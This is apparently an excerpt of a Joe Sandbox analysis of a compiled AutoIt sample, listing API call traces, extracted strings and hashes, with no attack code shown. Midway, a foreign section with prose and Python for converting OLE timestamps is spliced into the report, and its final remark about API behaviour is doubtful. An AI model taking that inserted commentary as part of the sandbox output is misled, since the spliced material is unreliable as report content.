                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                • String ID: @$ThumbnailClass
                                                                • API String ID: 1788623398-1539354611
                                                                • Opcode ID: c38d3fc18315bb9aacc8e142a366a589edcc0f23c5e458f6a553d9c949e1df92
                                                                • Instruction ID: 54dd65f03c951f515179a4411190745658a40040bdc753f86c7547ec731b2dae
                                                                • Opcode Fuzzy Hash: c38d3fc18315bb9aacc8e142a366a589edcc0f23c5e458f6a553d9c949e1df92
                                                                • Instruction Fuzzy Hash: 6D81D5311083459BDB0ACF10C885FEA7BE8FF49314F058469FD8A9A095DB70ED85CBA1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                • API String ID: 1038674560-1810252412
                                                                • Opcode ID: 73eb759042277967c15d147509065fb264dcde93ab3e86464de33f92d6ddd36c
                                                                • Instruction ID: e416748036da673d601eed769a10cb699f50ac27135be190d851b31246eda9f1
                                                                • Opcode Fuzzy Hash: 73eb759042277967c15d147509065fb264dcde93ab3e86464de33f92d6ddd36c
                                                                • Instruction Fuzzy Hash: 1B31DE31A88745BADF1AFF51DD53EEEB3A89F25744F600028F401B50D1EB61AF54CA91
                                                                APIs
                                                                • LoadIconW.USER32(00000063), ref: 0031EAB0
                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0031EAC2
                                                                • SetWindowTextW.USER32(?,?), ref: 0031EAD9
                                                                • GetDlgItem.USER32(?,000003EA), ref: 0031EAEE
                                                                • SetWindowTextW.USER32(00000000,?), ref: 0031EAF4
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0031EB04
                                                                • SetWindowTextW.USER32(00000000,?), ref: 0031EB0A
                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0031EB2B
                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0031EB45
                                                                • GetWindowRect.USER32(?,?), ref: 0031EB4E
                                                                • SetWindowTextW.USER32(?,?), ref: 0031EBB9
                                                                • GetDesktopWindow.USER32 ref: 0031EBBF
                                                                • GetWindowRect.USER32(00000000), ref: 0031EBC6
                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0031EC12
                                                                • GetClientRect.USER32(?,?), ref: 0031EC1F
                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0031EC44
                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0031EC6F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                • String ID:
                                                                • API String ID: 3869813825-0
                                                                • Opcode ID: e5bbf0adee708344d3d1da986592bc0c1ddfffb2303b4f63d8f1a540a35ebeff
                                                                • Instruction ID: 94e6ddf60de77aef3c7d1844fa032d3f08a5911f757d7b6f4da55e51267e12a8
                                                                • Opcode Fuzzy Hash: e5bbf0adee708344d3d1da986592bc0c1ddfffb2303b4f63d8f1a540a35ebeff
                                                                • Instruction Fuzzy Hash: C4516071904709AFDB26DFA8CD89FAEBBF9FF08704F008518E546A25A0C775A944CB10
                                                                APIs
                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 003379C6
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003379D1
                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 003379DC
                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 003379E7
                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 003379F2
                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 003379FD
                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00337A08
                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00337A13
                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00337A1E
                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00337A29
                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00337A34
                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00337A3F
                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00337A4A
                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00337A55
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00337A60
                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00337A6B
                                                                • GetCursorInfo.USER32(?), ref: 00337A7B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Cursor$Load$Info
                                                                • String ID:
                                                                • API String ID: 2577412497-0
                                                                • Opcode ID: 61ecd1d7cdefb5073cfab425ac1b758b030d3f0c7eda881256158f41c1afceb4
                                                                • Instruction ID: 95e968441aa09d0a8e3fe4c6bf4e4b02649655f071b47572fe4a4a9ea5d48499
                                                                • Opcode Fuzzy Hash: 61ecd1d7cdefb5073cfab425ac1b758b030d3f0c7eda881256158f41c1afceb4
                                                                • Instruction Fuzzy Hash: CC3107B1D4831EAADB619FB68C8995FBFE8FF04750F504526E50DE7280DA78A5008F91
                                                                APIs
                                                                  • Part of subcall function 002FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002EC8B7,?,00002000,?,?,00000000,?,002E419E,?,?,?,0037DC00), ref: 002FE984
                                                                  • Part of subcall function 002E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E53B1,?,?,002E61FF,?,00000000,00000001,00000000), ref: 002E662F
                                                                • __wsplitpath.LIBCMT ref: 002EC93E
                                                                  • Part of subcall function 00301DFC: __wsplitpath_helper.LIBCMT ref: 00301E3C
                                                                • _wcscpy.LIBCMT ref: 002EC953
                                                                • _wcscat.LIBCMT ref: 002EC968
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 002EC978
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 002ECABE
                                                                  • Part of subcall function 002EB337: _wcscpy.LIBCMT ref: 002EB36F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                • API String ID: 2258743419-1018226102
                                                                • Opcode ID: 0cdca449ac883ae79c5916da44194601f0fe9ab3584af495f4412d5b36a8fe1b
                                                                • Instruction ID: ee42aa22778d70c21f60549512831e0d292d931ccf7c221d340a30e7a1de3990
                                                                • Opcode Fuzzy Hash: 0cdca449ac883ae79c5916da44194601f0fe9ab3584af495f4412d5b36a8fe1b
                                                                • Instruction Fuzzy Hash: 6112E0710183819FC726EF65C841AAFBBE4BF88344F50482EF98997261DB30DA59CF52
                                                                APIs
                                                                • _memset.LIBCMT ref: 0034CEFB
                                                                • DestroyWindow.USER32(?,?), ref: 0034CF73
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0034CFF4
                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0034D016
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0034D025
                                                                • DestroyWindow.USER32(?), ref: 0034D042
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002E0000,00000000), ref: 0034D075
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0034D094
                                                                • GetDesktopWindow.USER32 ref: 0034D0A9
                                                                • GetWindowRect.USER32(00000000), ref: 0034D0B0
                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0034D0C2
                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0034D0DA
                                                                  • Part of subcall function 002FB526: GetWindowLongW.USER32(?,000000EB), ref: 002FB537
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                • String ID: 0$tooltips_class32
                                                                • API String ID: 3877571568-3619404913
                                                                • Opcode ID: c91e12618f0b4d81a5aa7fb64a04dc6ee70f2c8db7f92687daac1aee3b05e406
                                                                • Instruction ID: 528690ffc1302d6758a148e9d3e946d17fe930debbdb1a1d0c26a86b65713600
                                                                • Opcode Fuzzy Hash: c91e12618f0b4d81a5aa7fb64a04dc6ee70f2c8db7f92687daac1aee3b05e406
                                                                • Instruction Fuzzy Hash: AA71DFB5640305AFD722CF28CC85FAA77E9FB89704F48451DF9858B2A1D774E942CB22
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • DragQueryPoint.SHELL32(?,?), ref: 0034F37A
                                                                  • Part of subcall function 0034D7DE: ClientToScreen.USER32(?,?), ref: 0034D807
                                                                  • Part of subcall function 0034D7DE: GetWindowRect.USER32(?,?), ref: 0034D87D
                                                                  • Part of subcall function 0034D7DE: PtInRect.USER32(?,?,0034ED5A), ref: 0034D88D
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0034F3E3
                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0034F3EE
                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0034F411
                                                                • _wcscat.LIBCMT ref: 0034F441
                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0034F458
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0034F471
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0034F488
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0034F4AA
                                                                • DragFinish.SHELL32(?), ref: 0034F4B1
                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0034F59C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                • API String ID: 169749273-3440237614
                                                                • Opcode ID: 46486228613636cbc51cee61c91bfb573aebed6fc20406b30972594d2c7f3fdd
                                                                • Instruction ID: 127a1d87f34f2d0874c0722377a89def2d3bbb7c28e7f0a02a592d731f58834e
                                                                • Opcode Fuzzy Hash: 46486228613636cbc51cee61c91bfb573aebed6fc20406b30972594d2c7f3fdd
                                                                • Instruction Fuzzy Hash: 27617A71508300AFC302EF65CC85DAFBBF8EF89710F444A1EF695961A1DB70AA19CB52
                                                                APIs
                                                                • VariantInit.OLEAUT32(00000000), ref: 0032AB3D
                                                                • VariantCopy.OLEAUT32(?,?), ref: 0032AB46
                                                                • VariantClear.OLEAUT32(?), ref: 0032AB52
                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0032AC40
                                                                • __swprintf.LIBCMT ref: 0032AC70
                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0032AC9C
                                                                • VariantInit.OLEAUT32(?), ref: 0032AD4D
                                                                • SysFreeString.OLEAUT32(00000016), ref: 0032ADDF
                                                                • VariantClear.OLEAUT32(?), ref: 0032AE35
                                                                • VariantClear.OLEAUT32(?), ref: 0032AE44
                                                                • VariantInit.OLEAUT32(00000000), ref: 0032AE80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                • API String ID: 3730832054-3931177956
                                                                • Opcode ID: 5922b2d4fbc2a8d9e750a7e60ab2ecd6a374c36f1876055be34abfbd26c43c91
                                                                • Instruction ID: f1114e9e9f49e2c70d9d5f401933e4b530145b1450b4eecaf4b12758c0ae9e6c
                                                                • Opcode Fuzzy Hash: 5922b2d4fbc2a8d9e750a7e60ab2ecd6a374c36f1876055be34abfbd26c43c91
                                                                • Instruction Fuzzy Hash: 0AD12371A00A25DBDF229F65E884B7EF7B9FF04B00F1584A6E4159B580DB70EC50DBA2
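The VariantTimeToSystemTime call followed by __swprintf with "%4d%02d%02d%02d%02d%02d" converts an OLE automation DATE (a double counting days since 30 December 1899, with the fractional part as the time of day) into a YYYYMMDDHHMMSS string. OLE DATE values appear in many Windows artifacts, so the conversion is worth having as a stand-alone routine when triaging data this code produced. The Python below is an added example, not code from the report or from the sample: it implements the same conversion, including the OLE rule that the sign applies to the day count only (so -1.25 is 1899-12-29 06:00:00), plus the inverse for round-trip checks. The sample values are constructed, not taken from the analysis.

```python
from datetime import datetime, timedelta

# OLE automation DATE epoch: day 0 is 1899-12-30 00:00:00.
OLE_EPOCH = datetime(1899, 12, 30)


def variant_time_to_systemtime(vt):
    """Convert an OLE DATE double to a datetime.

    OLE convention: the integer part is a signed day count and the fractional
    part is always a positive fraction of that day, so -1.25 means day -1 plus
    six hours (1899-12-29 06:00), not 1899-12-28 18:00. The result is rounded
    to whole seconds; VariantTimeToSystemTime likewise yields no sub-second
    precision in the SYSTEMTIME it fills in.
    """
    days = int(vt)            # truncation toward zero keeps the sign on the day count
    frac = abs(vt - days)     # time of day, independent of the sign
    seconds = round(frac * 86400)
    if seconds == 86400:      # fraction rounded up to a full day
        days += 1
        seconds = 0
    return OLE_EPOCH + timedelta(days=days, seconds=seconds)


def format_autoit_timestamp(vt):
    """Render the converted time with the listing's "%4d%02d%02d%02d%02d%02d" format."""
    dt = variant_time_to_systemtime(vt)
    return "%4d%02d%02d%02d%02d%02d" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)


def systemtime_to_variant_time(dt):
    """Inverse conversion (datetime -> OLE DATE) for round-trip checks.

    timedelta normalises negative deltas to a negative day count plus a positive
    seconds field, which is exactly the OLE sign convention: for dates before the
    epoch the day count is negative and the day fraction is subtracted from it.
    """
    delta = dt - OLE_EPOCH
    frac = delta.seconds / 86400
    return delta.days - frac if delta.days < 0 else delta.days + frac


if __name__ == "__main__":
    # Constructed inputs: 2.5 is 1900-01-01 12:00, 45000.75 is 2023-03-15 18:00,
    # -1.25 is the pre-epoch edge case described above.
    for value in (2.5, 45000.75, -1.25):
        print(value, format_autoit_timestamp(value), systemtime_to_variant_time(variant_time_to_systemtime(value)))
```

Note that VariantTimeToSystemTime itself does not fail on values that produce out-of-range SYSTEMTIME fields in the way a strict parser would; when recovering timestamps from a dump, treat a year far outside the expected range as a sign that the double was not a DATE at all.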
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 003471FC
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00347247
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharMessageSendUpper
                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                • API String ID: 3974292440-4258414348
                                                                • Opcode ID: f09f63f61138b44aee164d84746e9755679c358c2373943dc9fc0ff95ef4adb3
                                                                • Instruction ID: 37b41685db73d8045a0ef319257c6017bb6c321712a85826940676e076ba99e6
                                                                • Opcode Fuzzy Hash: f09f63f61138b44aee164d84746e9755679c358c2373943dc9fc0ff95ef4adb3
                                                                • Instruction Fuzzy Hash: D9918D342187419BCB06EF20C851A6EB7E5BF94350F014869F9966B3A3DB70FD5ACB81
                                                                APIs
                                                                • EnumChildWindows.USER32(?,0031CF50), ref: 0031CE90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ChildEnumWindows
                                                                • String ID: 4+9$CLASS$CLASSNN$H+9$INSTANCE$L+9$NAME$P+9$REGEXPCLASS$T+9$TEXT
                                                                • API String ID: 3555792229-3904986593
                                                                • Opcode ID: a16ae9536245cec5bbc2afb78e338d98834c06dbe0bac688d86ef61425748a34
                                                                • Instruction ID: c62dbbd63372726731c29cd854bbd77914f4cd0a5ad8b95baeaf2367015984e5
                                                                • Opcode Fuzzy Hash: a16ae9536245cec5bbc2afb78e338d98834c06dbe0bac688d86ef61425748a34
                                                                • Instruction Fuzzy Hash: 1591D93065050AABCF1EDF60C481BEAFB75BF08340F519529E949A7191DF3069EACBE0
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0034E5AB
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0034BEAF), ref: 0034E607
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0034E647
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0034E68C
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0034E6C3
                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0034BEAF), ref: 0034E6CF
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0034E6DF
                                                                • DestroyIcon.USER32(?,?,?,?,?,0034BEAF), ref: 0034E6EE
                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0034E70B
                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0034E717
                                                                  • Part of subcall function 00300FA7: __wcsicmp_l.LIBCMT ref: 00301030
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                • String ID: .dll$.exe$.icl
                                                                • API String ID: 1212759294-1154884017
                                                                • Opcode ID: 59942d2e0b5c5d4bbcbde85f7012b9ceef2902f0a87770fc82cc4bf3bcb0a36a
                                                                • Instruction ID: 22d3a141b3f4d8482b2d2f7fc9d3efb2c7e99870cf4d076b3c6bdf655c7155e4
                                                                • Opcode Fuzzy Hash: 59942d2e0b5c5d4bbcbde85f7012b9ceef2902f0a87770fc82cc4bf3bcb0a36a
                                                                • Instruction Fuzzy Hash: BE61D171A40215BAEB26DF64CC46FFE77ACBB19714F118105F911EA0D1EBB4E990CB60
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CharLowerBuffW.USER32(?,?), ref: 0032D292
                                                                • GetDriveTypeW.KERNEL32 ref: 0032D2DF
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032D327
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032D35E
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032D38C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                • API String ID: 1148790751-4113822522
                                                                • Opcode ID: b15e08f68f693613cea2d2fa8f1142845208a6954ddfe26c4d641d3f0da6a5d8
                                                                • Instruction ID: 3a1e45edda152c6d4b9c021a0a59cd0afe5d6919e706d16d6bdb463b89a062c7
                                                                • Opcode Fuzzy Hash: b15e08f68f693613cea2d2fa8f1142845208a6954ddfe26c4d641d3f0da6a5d8
                                                                • Instruction Fuzzy Hash: A9516B715143449FC701EF11C88196EB3E8EF98758F51886DF88A672A1DB31EE1ACF82
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00353973,00000016,0000138C,00000016,?,00000016,0037DDB4,00000000,?), ref: 003226F1
                                                                • LoadStringW.USER32(00000000,?,00353973,00000016), ref: 003226FA
                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00353973,00000016,0000138C,00000016,?,00000016,0037DDB4,00000000,?,00000016), ref: 0032271C
                                                                • LoadStringW.USER32(00000000,?,00353973,00000016), ref: 0032271F
                                                                • __swprintf.LIBCMT ref: 0032276F
                                                                • __swprintf.LIBCMT ref: 00322780
                                                                • _wprintf.LIBCMT ref: 00322829
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00322840
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
